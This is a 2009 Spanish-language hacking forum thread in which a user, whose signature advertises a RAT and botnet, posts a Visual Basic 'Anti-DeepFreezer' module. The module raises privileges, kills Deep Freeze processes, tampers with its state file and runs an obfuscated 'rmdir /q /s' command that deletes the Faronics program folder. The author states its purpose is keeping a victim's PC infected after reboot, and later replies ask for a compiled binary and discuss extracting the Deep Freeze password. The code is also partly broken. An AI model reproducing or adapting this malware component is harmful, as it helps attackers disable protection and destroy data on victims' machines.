Mostrar mensajes previos
Ordenar por
por m3m0_11 Esquizofrénico
bueno,este proyecto es muy importante, y lo queria compartir con la comunidad

Código: Seleccionar todo

'||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
' Nombre Modulo: Anti-DeepFreezer
' Autor: m3m0_11
' Dependencias: Ninguna
' Distribucion: Este modulo es de distribucion libre distrubucion
'               y puede ser posteado en cualquier sitio siempre mencionando
'               el nombre del autor
'||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Option Explicit
 
Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" ( _
ByVal TokenHandle As Long, _
ByVal DisableAllPrivileges As Long, _
NewState As TOKEN_PRIVILEGES, _
ByVal BufferLength As Long, _
PreviousState As TOKEN_PRIVILEGES, _
ReturnLength As Long) As Long
 
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" ( _
ByVal lpSystemName As String, _
ByVal lpName As String, _
lpLUID As LUID) As Long
 
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
 
Private Declare Function OpenProcessToken Lib "advapi32.dll" ( _
ByVal ProcessHandle As Long, _
ByVal DesiredAccess As Long, _
TokenHandle As Long) As Long
 
 
Private Const ANYSIZE_ARRAY = 1
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const TOKEN_QUERY = &H8
Private Const SE_PRIVILEGE_ENABLED = &H2
 
Private Type LUID
    LowPart                     As Long
    HighPart                    As Long
End Type
 
Private Type LUID_AND_ATTRIBUTES
        pLuid                   As LUID
        Attributes              As Long
End Type
 
Private Type TOKEN_PRIVILEGES
    PrivilegeCount              As Long
    Privileges(ANYSIZE_ARRAY)   As LUID_AND_ATTRIBUTES
End Type
 
Public Const SE_SYSTEM_PROFILE_NAME      As String = "SeSystemProfilePrivilege"
 
Public Declare Function RtlSetProcessIsCritical Lib "ntdll.dll" ( _
ByVal NewValue As Boolean, _
ByVal OldValue As Boolean, _
ByVal WinLogon As Boolean)
 
Public Function ObtenerPrivilegios(ByVal privilegio As String) As Long
 
Dim lpLUID As LUID
Dim lpToken As TOKEN_PRIVILEGES
Dim lpAntToken As TOKEN_PRIVILEGES
Dim hToken As Long
Dim hProcess As Long
Dim res As Long
 
hProcess = GetCurrentProcess()
res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
If res = 0 Then
    Exit Function
End If
res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID)
If res = 0 Then
    Exit Function
End If
With lpToken
    .PrivilegeCount = 1
    .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
    .Privileges(0).pLuid = lpLUID
End With
 
res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken))
If res = 0 Then
    Exit Function
End If
ObtenerPrivilegios = res
End Function
 

Public Function mAntiDeep() As Boolean
        ObtenerPrivilegios SE_SYSTEM_PROFILE_NAME
        Dim objet As Object
        Set objet = GetObject("winmgmts:")
        If IsNull(objet) = False Then
            Dim list As Object
            Set list = objet.InstancesOf("win32_process")
            Dim procesoacerrar As Object
            If LCase$(procesoacerrar.Name) = "FrzState.exe" Then KillProcess ("FrzState.exe")
            If LCase$(procesoacerrar.Name) = "DFServEx.exe" Then KillProcess ("DFServEx.exe")
        End If
        If (file.Exists(Environ("windir") & "\Temp\_$Df\FrzState2k.sib")) Then
        Set list = Nothing
        Name Environ("windir") & "\Temp\_$Df\FrzState2k.sib" As Environ("windir") & "\Temp\_$Df\FrzState2k.fgbs"
        Shell "cmd.exe /c r" & "md" & "ir /q /" & "s C:\A" & "rchivos de pro" & "grama\" & "Far" & "onics"
        Else
        End
End Function

Public Sub KillProcess(ByVal processName As String)
    On Error GoTo ErrHandler
    Dim oWMI
    Dim ret
    Dim sService
    Dim oWMIServices
    Dim oWMIService
    Dim oServices
    Dim oService
    Dim servicename
    Set oWMI = GetObject("winmgmts:")
    Set oServices = oWMI.InstancesOf("win32_process")
    For Each oService In oServices
        servicename = LCase(Trim(CStr(oService.Name) & ""))
        If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then
            ret = oService.Terminate
        End If
    Next
    Set oServices = Nothing
    Set oWMI = Nothing
ErrHandler:
    Err.Clear
End Sub
salu2
Última edición por m3m0_11 el 15 Feb 2009, 21:57, editado 1 vez en total.
m3m0´s - RAT....(100%) --> publicado ;)
m3m0´s Botnet... (100%)
por PremeditoR Sin sí­ntomas
Te pasaste muy buen aporte m3mo esperamos tenerlo 100% funcional lo antes posible

+10
No Virus Total :) Gracias por no cagar el trabajo

Imagen
por m3m0_11 Esquizofrénico
es muy interesante, pero aora q me di cuenta tiene un bug y da error , os doy una explicacion del modulo

1.Nos ponemos atributos de system para poder matar los procesos del deepFreezer
2.Si existen los procesos, los matamos
3.Daño un archivo necesario, que contiene los datos de el punto anterior del PC

lo que pasaria, la pc quedaria infectada, pero al reinniciar el PC, no existe el archivo del deep freezer ni el punto de estado anterior del pc, lo que logramos que el PC siga como cuando se reinicio


salu2 espero que les sea util

PD: Bug corregido
m3m0´s - RAT....(100%) --> publicado ;)
m3m0´s Botnet... (100%)
por m3m0_11 Esquizofrénico
dios a nadie mas le interesa??? L0L, creo que ahun no existe ningun modulo de antiDeepFreezer, weno si no le interesa nada mas que a PremeditoR lo kito

salu2
m3m0´s - RAT....(100%) --> publicado ;)
m3m0´s Botnet... (100%)
por Xpro Usa camisa de fuerza
Amí si me interesa , eso sí xD no sé para qué es , así que gracias y para qué sirbe xD ?
Imagen

http://img844.imageshack.us/img844/8088/mujerrara.jpg
http://img715.imageshack.us/img715/5813/tigree.png
http://img830.imageshack.us/img830/6484/camaleon.png
http://img839.imageshack.us/img839/4944/tigrev2.jpg
http://img843.imageshack.us/img843/443/spidermanxn.png
http://www.youtube.com/watch?v=wHYYkciIKE0
por leos_79 Se medica
jaja como odio que todo este escrito en visual basic.

buen aporte amigo! , lastima que se aprecia mas un cripter q haga indetectable virus y ninporta como funcione , que un aportazo asi, me ah pasado ejej

saludos!!
No hay éxito como el fracaso, pero el fracaso no es ningun éxito...
por m3m0_11 Esquizofrénico
lamentablemente si pero aver, la gente no sabria usar esto entonces se lo enseñas y dicen "Y esto como se come?", pero es muy util

salu2
m3m0´s - RAT....(100%) --> publicado ;)
m3m0´s Botnet... (100%)
por Xpro Usa camisa de fuerza
m3m0_11 escribió:lamentablemente si pero aver, la gente no sabria usar esto entonces se lo enseñas y dicen "Y esto como se come?", pero es muy util

salu2

Jajaja , pues haber si me dices para qué se puede usar , y en qué casos ^^

Gracias por el " Aportaso "
Imagen

http://img844.imageshack.us/img844/8088/mujerrara.jpg
http://img715.imageshack.us/img715/5813/tigree.png
http://img830.imageshack.us/img830/6484/camaleon.png
http://img839.imageshack.us/img839/4944/tigrev2.jpg
http://img843.imageshack.us/img843/443/spidermanxn.png
http://www.youtube.com/watch?v=wHYYkciIKE0
por DeuSer Delirios esporádicos
xpro escribió:Jajaja , pues haber si me dices para qué se puede usar , y en qué casos ^^
Creo que sirve por si la victima tiene deep freez desactivarselo.... no estoy muy seguro, pero creo que es para eso, esperemos a ver que dice m3m0 !

Saludos

Código: Seleccionar todo

La frase de abajo no dice la verdad.

La frase de arriba dice la verdad.
por Matatán Incurable
Para las versiones inferiores a la 6 hay una app que lo quita con solo ejecutarlo,pero para las versiones superiores necesitamos un livecd,pero esto memo es un aportazo...Gracias x compartir...
#Brrr :boxing:
por strike Sin sí­ntomas
Hola, soy nuevo en este foro, que por cierto me gusta mucho xD

En este codigo me da error al compilarlo con Visual Basic 6, haber si alguien puede arreglar los errores ya que mis conocimientos de VB son pocos. A ver si seria posible que alguien los compilara bien y subiera el archivo listo para ser ejecutado...


Muchas gracias
por wyver
. A ver si seria posible que alguien los compilara bien y subiera el archivo listo para ser ejecutado...
ke mas se le ofrece?
unos cigarrillos? una tasa de cafe?? algo mas??...



SSaludos
por wasamandrapa Se conecta desde un manicomio
Pues a mí si me importa esto es un buen aporte y vale , personalmente estuve buscando uno asi hace un buen tiempo, yo de distraído que recién paso por aquí .
También quería decir que existe una herramienta que nos permite desactivar el DeepFreezser solo para la versión 6, como nos lo dijo un compañero que ya posteo arriba, será bueno crear una que en vez de que mate el proceso o haga otra cosa mas, este mismo desencrypte la password del deepfreezer, que si no me equivoco esta guardado en la placa, y en las nuevas versiones esta misma pass se encuentra en el disco duro o en la placa.
saludos
-Aprovechemos mientras Windows es vulnerable.
-No hagas a otros lo que no te gustaría que hagan con.... tu mamá.
-El mejor Snifer es tu propio ISP.
Temas similares
Saltar Nod32 Modulo Amsi por aficionadohxc en Dudas y Preguntas
Links sobre el tema
Variantes de tema
Responder

Volver a “Otros lenguajes”